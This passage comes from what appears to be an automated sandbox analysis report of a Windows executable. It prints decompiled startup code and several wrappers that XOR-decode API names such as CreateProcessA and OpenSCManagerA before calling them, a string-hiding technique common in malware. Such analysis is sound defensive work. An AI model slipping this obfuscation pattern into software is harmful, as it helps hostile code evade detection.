                                                                    				E00422920(0x94, __ecx, 0x4303a8);
                                                                    				 *(_t90 - 0x18) = _t91;
                                                                    				_t85 = _t91;
                                                                    				_t85->dwOSVersionInfoSize = 0x94;
                                                                    				GetVersionExA(_t85);
                                                                    				_t68 = _t85->dwPlatformId;
                                                                    				 *0x448268 = _t68;
                                                                    				_t35 = _t85->dwMajorVersion;
                                                                    				 *0x448274 = _t35;
                                                                    				_t79 = _t85->dwMinorVersion;
                                                                    				 *0x448278 = _t79;
                                                                    				_t87 = _t85->dwBuildNumber & 0x00007fff;
                                                                    				 *0x44826c = _t87;
                                                                    				if(_t68 != 2) {
                                                                    					 *0x44826c = _t87 | 0x00008000;
                                                                    				}
                                                                    				 *0x448270 = (_t35 << 8) + _t79;
                                                                    				_t38 = GetModuleHandleA(0);
                                                                    				if(_t38->i != 0x5a4d) {
                                                                    					L6:
                                                                    					 *(_t90 - 0x1c) = 0;
                                                                    				} else {
                                                                    					_t78 =  *((intOrPtr*)(_t38 + 0x3c)) + _t38;
                                                                    					if( *_t78 != 0x4550) {
                                                                    						goto L6;
                                                                    					} else {
                                                                    						_t63 =  *(_t78 + 0x18) & 0x0000ffff;
                                                                    						if(_t63 == 0x10b) {
                                                                    							__eflags =  *((intOrPtr*)(_t78 + 0x74)) - 0xe;
                                                                    							if( *((intOrPtr*)(_t78 + 0x74)) <= 0xe) {
                                                                    								goto L6;
                                                                    							} else {
                                                                    								_t64 = 0;
                                                                    								__eflags =  *(_t78 + 0xe8);
                                                                    								goto L11;
                                                                    							}
                                                                    						} else {
                                                                    							if(_t63 == 0x20b) {
                                                                    								__eflags =  *((intOrPtr*)(_t78 + 0x84)) - 0xe;
                                                                    								if( *((intOrPtr*)(_t78 + 0x84)) <= 0xe) {
                                                                    									goto L6;
                                                                    								} else {
                                                                    									_t64 = 0;
                                                                    									__eflags =  *(_t78 + 0xf8);
                                                                    									L11:
                                                                    									_t14 = __eflags != 0;
                                                                    									__eflags = _t14;
                                                                    									 *(_t90 - 0x1c) = _t64 & 0xffffff00 | _t14;
                                                                    								}
                                                                    							} else {
                                                                    								goto L6;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				if(E00424675(1) == 0) {
                                                                    					_push(0x1c);
                                                                    					E00422C4B(_t39, 0);
                                                                    				}
                                                                    				_t40 = E00423D97();
                                                                    				_t101 = _t40;
                                                                    				if(_t40 == 0) {
                                                                    					_push(0x10);
                                                                    					E00422C4B(_t40, 0);
                                                                    				}
                                                                    				E0042739A(_t101);
                                                                    				 *(_t90 - 4) = 0;
                                                                    				if(E0042719C() < 0) {
                                                                    					E00422C26(0x1b);
                                                                    				}
                                                                    				 *0x44c29c = GetCommandLineA();
                                                                    				 *0x4480e0 = E0042707A();
                                                                    				if(E00426FD8() < 0) {
                                                                    					E00422C26(8);
                                                                    				}
                                                                    				if(E00426DA5() < 0) {
                                                                    					E00422C26(9);
                                                                    				}
                                                                    				_t47 = E004253F0(1);
                                                                    				 *((intOrPtr*)(_t90 - 0x28)) = _t47;
                                                                    				if(_t47 != 0) {
                                                                    					E00422C26(_t47);
                                                                    				}
                                                                    				 *(_t90 - 0x44) = 0;
                                                                    				GetStartupInfoA(_t90 - 0x70);
                                                                    				 *((intOrPtr*)(_t90 - 0x20)) = E00426D48();
                                                                    				if(( *(_t90 - 0x44) & 0x00000001) == 0) {
                                                                    					_t50 = 0xa;
                                                                    				} else {
                                                                    					_t50 =  *(_t90 - 0x40) & 0x0000ffff;
                                                                    				}
                                                                    				_push(_t50);
                                                                    				_t52 = L00413C60(GetModuleHandleA(0), 0,  *((intOrPtr*)(_t90 - 0x20)));
                                                                    				_t83 = _t52;
                                                                    				 *((intOrPtr*)(_t90 - 0x2c)) = _t52;
                                                                    				if( *(_t90 - 0x1c) == 0) {
                                                                    					E0042551D(_t83);
                                                                    				}
                                                                    				E0042553F();
                                                                    				 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
                                                                    				return E00424267(_t83);
                                                                    			}


















                                                                    0x00422c6f
                                                                    0x00422c76
                                                                    0x00422c82
                                                                    0x00422c87
                                                                    0x00422c8a
                                                                    0x00422c8c
                                                                    0x00422c8f
                                                                    0x00422c95
                                                                    0x00422c98
                                                                    0x00422c9e
                                                                    0x00422ca1
                                                                    0x00422ca6
                                                                    0x00422ca9
                                                                    0x00422cb2
                                                                    0x00422cb8
                                                                    0x00422cc1
                                                                    0x00422cc9
                                                                    0x00422cc9
                                                                    0x00422cd4
                                                                    0x00422ce2
                                                                    0x00422ce9
                                                                    0x00422d0a
                                                                    0x00422d0a
                                                                    0x00422ceb
                                                                    0x00422cee
                                                                    0x00422cf6
                                                                    0x00000000
                                                                    0x00422cf8
                                                                    0x00422cf8
                                                                    0x00422d01
                                                                    0x00422d22
                                                                    0x00422d26
                                                                    0x00000000
                                                                    0x00422d28
                                                                    0x00422d28
                                                                    0x00422d2a
                                                                    0x00000000
                                                                    0x00422d2a
                                                                    0x00422d03
                                                                    0x00422d08
                                                                    0x00422d0f
                                                                    0x00422d16
                                                                    0x00000000
                                                                    0x00422d18
                                                                    0x00422d18
                                                                    0x00422d1a
                                                                    0x00422d30
                                                                    0x00422d30
                                                                    0x00422d30
                                                                    0x00422d33
                                                                    0x00422d33
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00422d08
                                                                    0x00422d01
                                                                    0x00422cf6
                                                                    0x00422d40
                                                                    0x00422d42
                                                                    0x00422d44
                                                                    0x00422d49
                                                                    0x00422d4a
                                                                    0x00422d4f
                                                                    0x00422d51
                                                                    0x00422d53
                                                                    0x00422d55
                                                                    0x00422d5a
                                                                    0x00422d5b
                                                                    0x00422d60
                                                                    0x00422d6a
                                                                    0x00422d6e
                                                                    0x00422d73
                                                                    0x00422d7a
                                                                    0x00422d84
                                                                    0x00422d90
                                                                    0x00422d94
                                                                    0x00422d99
                                                                    0x00422da1
                                                                    0x00422da5
                                                                    0x00422daa
                                                                    0x00422dad
                                                                    0x00422db3
                                                                    0x00422db8
                                                                    0x00422dbb
                                                                    0x00422dc0
                                                                    0x00422dc1
                                                                    0x00422dc8
                                                                    0x00422dd3
                                                                    0x00422dda
                                                                    0x00422de4
                                                                    0x00422ddc
                                                                    0x00422ddc
                                                                    0x00422ddc
                                                                    0x00422de5
                                                                    0x00422dee
                                                                    0x00422df3
                                                                    0x00422df5
                                                                    0x00422dfb
                                                                    0x00422dfe
                                                                    0x00422dfe
                                                                    0x00422e03
                                                                    0x00422e35
                                                                    0x00422e43

                                                                    APIs
                                                                    • GetVersionExA.KERNEL32(?,004303A8,00000060), ref: 00422C8F
                                                                    • GetModuleHandleA.KERNEL32(00000000,?,004303A8,00000060), ref: 00422CE2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModuleVersion
                                                                    • String ID: Mqt`7utIqt
                                                                    • API String ID: 3651626284-2786406774
                                                                    • Opcode ID: 468f6f0264c1f8661a56af585a2e7deff08955a6ad12e88501f7798046568b96
                                                                    • Instruction ID: bf21261726a03d434cab0292fedb3a1e14e8891f35a5115cf40d0211426e89a4
                                                                    • Opcode Fuzzy Hash: 468f6f0264c1f8661a56af585a2e7deff08955a6ad12e88501f7798046568b96
                                                                    • Instruction Fuzzy Hash: 51218DB1B107349BDB20AFB6BD1565E7BB4BF45304F50452EE804A7261DBBC9842CB9C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 62 41b070-41b07a 63 41b0e2-41b119 CreateProcessA 62->63 64 41b07c-41b0c5 62->64 65 41b0c7-41b0cf 64->65 65->65 66 41b0d1-41b0dd call 41a600 65->66 66->63
                                                                    C-Code - Quality: 100%
                                                                    			E0041B070(CHAR* _a4, CHAR* _a8, struct _SECURITY_ATTRIBUTES* _a12, struct _SECURITY_ATTRIBUTES* _a16, int _a20, long _a24, void* _a28, CHAR* _a32, struct _STARTUPINFOA* _a36, struct _PROCESS_INFORMATION* _a40) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				int _t28;
                                                                    				void* _t31;
                                                                    				CHAR* _t45;
                                                                    
                                                                    				if( *0x447e24 == 0) {
                                                                    					_v14 = 0x22;
                                                                    					_v11 = 0x22;
                                                                    					_v6 = 0x22;
                                                                    					_v5 = 0x34;
                                                                    					_v4 = 0x34;
                                                                    					 *_t45 = 4;
                                                                    					_v15 = 0x35;
                                                                    					_v13 = 0x26;
                                                                    					_v12 = 0x33;
                                                                    					_v10 = 0x17;
                                                                    					_v9 = 0x35;
                                                                    					_v8 = 0x28;
                                                                    					_v7 = 0x24;
                                                                    					_v3 = 6;
                                                                    					_v2 = 0x47;
                                                                    					_t31 = 0;
                                                                    					do {
                                                                    						 *(_t45 + _t31) =  *(_t45 + _t31) ^ 0x00000047;
                                                                    						_t31 = _t31 + 1;
                                                                    					} while (_t31 < 0xf);
                                                                    					 *0x447e24 = E0041A600(_t45);
                                                                    				}
                                                                    				_t28 = CreateProcessA(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                                                    				return _t28;
                                                                    			}




















                                                                    0x0041b07a
                                                                    0x0041b07e
                                                                    0x0041b082
                                                                    0x0041b086
                                                                    0x0041b08e
                                                                    0x0041b092
                                                                    0x0041b096
                                                                    0x0041b09a
                                                                    0x0041b09e
                                                                    0x0041b0a3
                                                                    0x0041b0a8
                                                                    0x0041b0ad
                                                                    0x0041b0b1
                                                                    0x0041b0b6
                                                                    0x0041b0bb
                                                                    0x0041b0c0
                                                                    0x0041b0c5
                                                                    0x0041b0c7
                                                                    0x0041b0c7
                                                                    0x0041b0cb
                                                                    0x0041b0cc
                                                                    0x0041b0dd
                                                                    0x0041b0dd
                                                                    0x0041b114
                                                                    0x0041b119

                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0041B114
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: $$&$($3$G$Bqt
                                                                    • API String ID: 963392458-2410241034
                                                                    • Opcode ID: 77e6315c145215107d669ae5ad67f76200347b751cfd67e7b38952f09d2c515b
                                                                    • Instruction ID: a38b2cfae124edf7d962ca32f722b73c60a6474bbb5d8773882c0e656605b8a9
                                                                    • Opcode Fuzzy Hash: 77e6315c145215107d669ae5ad67f76200347b751cfd67e7b38952f09d2c515b
                                                                    • Instruction Fuzzy Hash: 3B11476110E3C0AED341EB68D544A4BBFE55BEA604F88DC8CF1C887242D278D809C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 69 41d0a0-41d0aa 70 41d113-41d127 OpenSCManagerA 69->70 71 41d0ac-41d0f6 69->71 72 41d0f8-41d100 71->72 72->72 73 41d102-41d10e call 41c580 72->73 73->70
                                                                    C-Code - Quality: 100%
                                                                    			E0041D0A0(char* _a4, char* _a8, int _a12) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				void* _t21;
                                                                    				void* _t23;
                                                                    				CHAR* _t31;
                                                                    
                                                                    				if( *0x447f50 == 0) {
                                                                    					_v9 = 0x79;
                                                                    					_v7 = 0x79;
                                                                    					 *_t31 = 0x57;
                                                                    					_v15 = 0x68;
                                                                    					_v14 = 0x7d;
                                                                    					_v13 = 0x76;
                                                                    					_v12 = 0x4b;
                                                                    					_v11 = 0x5b;
                                                                    					_v10 = 0x55;
                                                                    					_v8 = 0x76;
                                                                    					_v6 = 0x7f;
                                                                    					_v5 = 0x7d;
                                                                    					_v4 = 0x6a;
                                                                    					_v3 = 0x59;
                                                                    					_v2 = 0x18;
                                                                    					_t23 = 0;
                                                                    					do {
                                                                    						 *(_t31 + _t23) =  *(_t31 + _t23) ^ 0x00000018;
                                                                    						_t23 = _t23 + 1;
                                                                    					} while (_t23 < 0xf);
                                                                    					 *0x447f50 = E0041C580(_t31);
                                                                    				}
                                                                    				_t21 = OpenSCManagerA(_a4, _a8, _a12); // executed
                                                                    				return _t21;
                                                                    			}




















                                                                    0x0041d0aa
                                                                    0x0041d0b2
                                                                    0x0041d0b6
                                                                    0x0041d0ba
                                                                    0x0041d0be
                                                                    0x0041d0c3
                                                                    0x0041d0c7
                                                                    0x0041d0cb
                                                                    0x0041d0d0
                                                                    0x0041d0d5
                                                                    0x0041d0da
                                                                    0x0041d0de
                                                                    0x0041d0e3
                                                                    0x0041d0e7
                                                                    0x0041d0ec
                                                                    0x0041d0f1
                                                                    0x0041d0f6
                                                                    0x0041d0f8
                                                                    0x0041d0f8
                                                                    0x0041d0fc
                                                                    0x0041d0fd
                                                                    0x0041d10e
                                                                    0x0041d10e
                                                                    0x0041d122
                                                                    0x0041d127

                                                                    APIs
                                                                    • OpenSCManagerA.ADVAPI32(?,?,?,80000000,0000FFB9,?,00447B7C,?,?,?,?,?,?,?,0041F71F,?), ref: 0041D122
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ManagerOpen
                                                                    • String ID: K$U$Y$[$h$j
                                                                    • API String ID: 1889721586-3439934199
                                                                    • Opcode ID: f0bffc2de1e2e0f648bbca4067eedd5324fef01a4a6821828f74599e1ab0985d
                                                                    • Instruction ID: d79afe7a9d57b16d3910075a61d7c4bb3053336fc548d9e1ccbd50dab9dca52a
                                                                    • Opcode Fuzzy Hash: f0bffc2de1e2e0f648bbca4067eedd5324fef01a4a6821828f74599e1ab0985d
                                                                    • Instruction Fuzzy Hash: 2501E56550C3C0AED302DB78984469BBFD15BA2248F18CC9DE4E887253D679854AC767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 76 41acd0-41acda 77 41ad2b-41ad3f RtlAllocateHeap 76->77 78 41acdc-41ad0f 76->78 79 41ad10-41ad18 78->79 79->79 80 41ad1a-41ad26 call 41a600 79->80 80->77
                                                                    C-Code - Quality: 100%
                                                                    			E0041ACD0(void* _a4, long _a8, long _a12) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				void* _t16;
                                                                    				void* _t18;
                                                                    				CHAR* _t24;
                                                                    
                                                                    				if( *0x447df4 == 0) {
                                                                    					_v7 = 0x34;
                                                                    					_v6 = 0x34;
                                                                    					 *_t24 = 0x10;
                                                                    					_v11 = 0x3d;
                                                                    					_v10 = 0x39;
                                                                    					_v9 = 0x28;
                                                                    					_v8 = 0x19;
                                                                    					_v5 = 0x37;
                                                                    					_v4 = 0x3b;
                                                                    					_v3 = 0x58;
                                                                    					_t18 = 0;
                                                                    					do {
                                                                    						 *(_t24 + _t18) =  *(_t24 + _t18) ^ 0x00000058;
                                                                    						_t18 = _t18 + 1;
                                                                    					} while (_t18 < 0xa);
                                                                    					 *0x447df4 = E0041A600(_t24);
                                                                    				}
                                                                    				_t16 = RtlAllocateHeap(_a4, _a8, _a12); // executed
                                                                    				return _t16;
                                                                    			}















                                                                    0x0041acda
                                                                    0x0041acde
                                                                    0x0041ace2
                                                                    0x0041ace6
                                                                    0x0041acea
                                                                    0x0041acef
                                                                    0x0041acf4
                                                                    0x0041acf9
                                                                    0x0041acfe
                                                                    0x0041ad03
                                                                    0x0041ad08
                                                                    0x0041ad0d
                                                                    0x0041ad10
                                                                    0x0041ad10
                                                                    0x0041ad14
                                                                    0x0041ad15
                                                                    0x0041ad26
                                                                    0x0041ad26
                                                                    0x0041ad3a
                                                                    0x0041ad3f

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,?,?,00447B68,?,00000001), ref: 0041AD3A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID: ($7$9$;$=$X
                                                                    • API String ID: 1279760036-3331253663
                                                                    • Opcode ID: e40c0d4991134628340334a6122d947139d50196280383b841fb72cb1d3ef8be
                                                                    • Instruction ID: 68a1602569ac716cfebf445b28d72d2d603e3db6222b54e77429e6ee4904ab1e
                                                                    • Opcode Fuzzy Hash: e40c0d4991134628340334a6122d947139d50196280383b841fb72cb1d3ef8be
                                                                    • Instruction Fuzzy Hash: CA012CA450D3C09DE302DB68E544B5BBFD55BA2308F44C86EE4C987242D679C559C727
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 97 41b470-41b47a 98 41b4cb-41b4e9 WriteFile 97->98 99 41b47c-41b4af 97->99 100 41b4b0-41b4b8 99->100 100->100 101 41b4ba-41b4c6 call 41a600 100->101 101->98
                                                                    C-Code - Quality: 100%
                                                                    			E0041B470(void* _a4, void* _a8, long _a12, DWORD* _a16, struct _OVERLAPPED* _a20) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				int _t18;
                                                                    				void* _t20;
                                                                    				CHAR* _t29;
                                                                    
                                                                    				if( *0x447e58 == 0) {
                                                                    					_v8 = 0x4b;
                                                                    					_v4 = 0x4b;
                                                                    					 *_t29 = 0x79;
                                                                    					_v11 = 0x5c;
                                                                    					_v10 = 0x47;
                                                                    					_v9 = 0x5a;
                                                                    					_v7 = 0x68;
                                                                    					_v6 = 0x47;
                                                                    					_v5 = 0x42;
                                                                    					_v3 = 0x2e;
                                                                    					_t20 = 0;
                                                                    					do {
                                                                    						 *(_t29 + _t20) =  *(_t29 + _t20) ^ 0x0000002e;
                                                                    						_t20 = _t20 + 1;
                                                                    					} while (_t20 < 0xa);
                                                                    					 *0x447e58 = E0041A600(_t29);
                                                                    				}
                                                                    				_t18 = WriteFile(_a4, _a8, _a12, _a16, _a20); // executed
                                                                    				return _t18;
                                                                    			}















                                                                    0x0041b47a
                                                                    0x0041b480
                                                                    0x0041b484
                                                                    0x0041b488
                                                                    0x0041b48c
                                                                    0x0041b491
                                                                    0x0041b495
                                                                    0x0041b49a
                                                                    0x0041b49f
                                                                    0x0041b4a3
                                                                    0x0041b4a8
                                                                    0x0041b4ad
                                                                    0x0041b4b0
                                                                    0x0041b4b0
                                                                    0x0041b4b4
                                                                    0x0041b4b5
                                                                    0x0041b4c6
                                                                    0x0041b4c6
                                                                    0x0041b4e4
                                                                    0x0041b4e9

                                                                    APIs
                                                                    • WriteFile.KERNELBASE(?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 0041B4E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID: .$B$Z$\$h
                                                                    • API String ID: 3934441357-343618136
                                                                    • Opcode ID: b9b21e5b08b9d8b1a76abf4df65287e8640ae3171ae258463ff2cd3b1f67faf0
                                                                    • Instruction ID: 9e62ccc2ccab6145aa0e6263bf661d2063b954a4fc4054bab73281166bffa068
                                                                    • Opcode Fuzzy Hash: b9b21e5b08b9d8b1a76abf4df65287e8640ae3171ae258463ff2cd3b1f67faf0
                                                                    • Instruction Fuzzy Hash: 7A015AA110C3C0AED301DBA8E844A5BBFE55BE6304F18CD5CF0D887242D279C84AC72B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 104 425396-4253a3 106 4253a5-4253b3 GetProcAddress 104->106 107 4253bb-4253bf ExitProcess 104->107 106->107 108 4253b5 106->108 108->107
                                                                    C-Code - Quality: 68%
                                                                    			E00425396(int _a4) {
                                                                    				struct HINSTANCE__* _t3;
                                                                    				_Unknown_base(*)()* _t4;
                                                                    
                                                                    				_t3 = GetModuleHandleA("mscoree.dll");
                                                                    				if(_t3 != 0) {
                                                                    					_t4 = GetProcAddress(_t3, "CorExitProcess");
                                                                    					if(_t4 != 0) {
                                                                    						 *_t4(_a4);
                                                                    					}
                                                                    				}
                                                                    				ExitProcess(_a4);
                                                                    			}





                                                                    0x0042539b
                                                                    0x004253a3
                                                                    0x004253ab
                                                                    0x004253b3
                                                                    0x004253b9
                                                                    0x004253b9
                                                                    0x004253b3
                                                                    0x004253bf

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(mscoree.dll,00425504,?,00430658,00000008,0042553B,?,00000001,00000000,00429D9B,00000003), ref: 0042539B
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004253AB
                                                                    • ExitProcess.KERNEL32 ref: 004253BF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressExitHandleModuleProcProcess
                                                                    • String ID: CorExitProcess$mscoree.dll$Mqt`7utIqt
                                                                    • API String ID: 75539706-2436749482
                                                                    • Opcode ID: ff917975f4c10fa9d34215895b9f096ed1fdebb81394d224e8fa3d60a7a1ef10
                                                                    • Instruction ID: 9bf8c4e0c9a6583785c89ea69a9a746f61292f79e8f7ca4467acd2ae4f5fde5c
                                                                    • Opcode Fuzzy Hash: ff917975f4c10fa9d34215895b9f096ed1fdebb81394d224e8fa3d60a7a1ef10
                                                                    • Instruction Fuzzy Hash: DDD0C970308200ABDB142B61BD3EB5B3AB8AF84B51B102A25B849D0171CF78C810DE1D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 109 41b3f0-41b3fa 110 41b44b-41b469 ReadFile 109->110 111 41b3fc-41b42a 109->111 112 41b430-41b438 111->112 112->112 113 41b43a-41b446 call 41a600 112->113 113->110
                                                                    C-Code - Quality: 100%
                                                                    			E0041B3F0(void* _a4, void* _a8, long _a12, DWORD* _a16, struct _OVERLAPPED* _a20) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				int _t17;
                                                                    				void* _t19;
                                                                    				CHAR* _t27;
                                                                    
                                                                    				if( *0x447e54 == 0) {
                                                                    					_v11 = 5;
                                                                    					_v5 = 5;
                                                                    					 *_t27 = 0x32;
